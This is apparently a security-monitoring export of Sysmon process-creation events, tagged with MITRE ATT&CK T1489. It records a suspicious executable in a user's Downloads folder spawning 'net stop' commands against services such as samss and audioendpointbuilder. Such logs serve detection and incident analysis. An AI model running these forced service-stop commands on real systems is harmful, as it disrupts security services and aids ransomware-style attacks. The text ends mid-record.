{df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b25-5ec9-0000-001054922500} +ParentProcessId: 246028 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:30.244724000Z"",""eventRecordID"":""1720"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:30.212\r\nProcessGuid: {df9fc3d3-1b26-5ec9-0000-001026a72500}\r\nProcessId: 246552\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b25-5ec9-0000-001054922500}\r\nParentProcessId: 246028\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:30.212"",""processGuid"":""{df9fc3d3-1b26-5ec9-0000-001026a72500}"",""processId"":""246552"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b25-5ec9-0000-001054922500}"",""parentProcessId"":""246028"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:46:31.640",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:29.830 +ProcessGuid: {df9fc3d3-1b25-5ec9-0000-001054922500} +ProcessId: 246028 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:29.861731900Z"",""eventRecordID"":""1719"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:29.830\r\nProcessGuid: {df9fc3d3-1b25-5ec9-0000-001054922500}\r\nProcessId: 246028\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:29.830"",""processGuid"":""{df9fc3d3-1b25-5ec9-0000-001054922500}"",""processId"":""246028"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:04.341",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:02.602 +ProcessGuid: {df9fc3d3-1b0a-5ec9-0000-0010dc5f2100} +ProcessId: 211924 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b09-5ec9-0000-001030572100} +ParentProcessId: 3320 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:02.644967200Z"",""eventRecordID"":""1717"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:02.602\r\nProcessGuid: {df9fc3d3-1b0a-5ec9-0000-0010dc5f2100}\r\nProcessId: 211924\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b09-5ec9-0000-001030572100}\r\nParentProcessId: 3320\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:02.602"",""processGuid"":""{df9fc3d3-1b0a-5ec9-0000-0010dc5f2100}"",""processId"":""211924"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 
stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b09-5ec9-0000-001030572100}"",""parentProcessId"":""3320"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:46:03.411",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:02.582 +ProcessGuid: {df9fc3d3-1b0a-5ec9-0000-0010ac5e2100} +ProcessId: 211928 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b09-5ec9-0000-001046522100} +ParentProcessId: 3920 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:02.599019000Z"",""eventRecordID"":""1716"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:02.582\r\nProcessGuid: {df9fc3d3-1b0a-5ec9-0000-0010ac5e2100}\r\nProcessId: 211928\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b09-5ec9-0000-001046522100}\r\nParentProcessId: 3920\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:02.582"",""processGuid"":""{df9fc3d3-1b0a-5ec9-0000-0010ac5e2100}"",""processId"":""211928"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b09-5ec9-0000-001046522100}"",""parentProcessId"":""3920"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:46:03.388",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:01.912 +ProcessGuid: {df9fc3d3-1b09-5ec9-0000-001030572100} +ProcessId: 3320 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:02.070058900Z"",""eventRecordID"":""1715"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:01.912\r\nProcessGuid: {df9fc3d3-1b09-5ec9-0000-001030572100}\r\nProcessId: 3320\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:01.912"",""processGuid"":""{df9fc3d3-1b09-5ec9-0000-001030572100}"",""processId"":""3320"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:03.376",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:01.627 +ProcessGuid: {df9fc3d3-1b09-5ec9-0000-001046522100} +ProcessId: 3920 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:01.635623200Z"",""eventRecordID"":""1714"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:01.627\r\nProcessGuid: {df9fc3d3-1b09-5ec9-0000-001046522100}\r\nProcessId: 3920\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:01.627"",""processGuid"":""{df9fc3d3-1b09-5ec9-0000-001046522100}"",""processId"":""3920"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:50.715",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:49.375 +ProcessGuid: {df9fc3d3-1afd-5ec9-0000-00106f1a1f00} +ProcessId: 191128 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010d00f1f00} +ParentProcessId: 211964 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:49.399400300Z"",""eventRecordID"":""1713"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:49.375\r\nProcessGuid: {df9fc3d3-1afd-5ec9-0000-00106f1a1f00}\r\nProcessId: 191128\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010d00f1f00}\r\nParentProcessId: 211964\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:49.375"",""processGuid"":""{df9fc3d3-1afd-5ec9-0000-00106f1a1f00}"",""processId"":""191128"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 
